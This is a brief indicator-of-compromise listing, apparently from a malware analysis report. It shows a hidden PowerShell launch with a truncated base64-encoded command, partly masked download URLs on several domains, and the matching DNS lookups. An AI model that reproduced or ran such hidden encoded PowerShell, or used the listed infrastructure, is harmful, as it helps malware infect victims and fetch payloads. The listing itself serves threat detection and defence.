Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABGAGwAeAByAGgAYwBmAGQAPQAnAEEAZQBwAG8AcQBhAHcAcABjAHkAcgBrACcAOwAkAFYAdwBnAHkAbwBzAGwAcwBzAGgAbgBzACAAPQAgACcANwA3ACcAOwAkAFMAbwByAHcAeAB1AHUAcQBzAD0AJwBXAHQ...
- 'pr#####ionalfriends.in':80
- http://www.qu#####sencialghero.com/doc/7jh1-9rlrb4j4w-6761362525/
- http://www.er###ontia.com/backup/rYkTRwX/
- http://ne#.###.netmessage.net/sdlkitj8kfd/zpKHTt/
- DNS ASK qu#####sencialghero.com
- DNS ASK er###ontia.com
- DNS ASK ne#.###.netmessage.net
- DNS ASK pr#####ionalfriends.in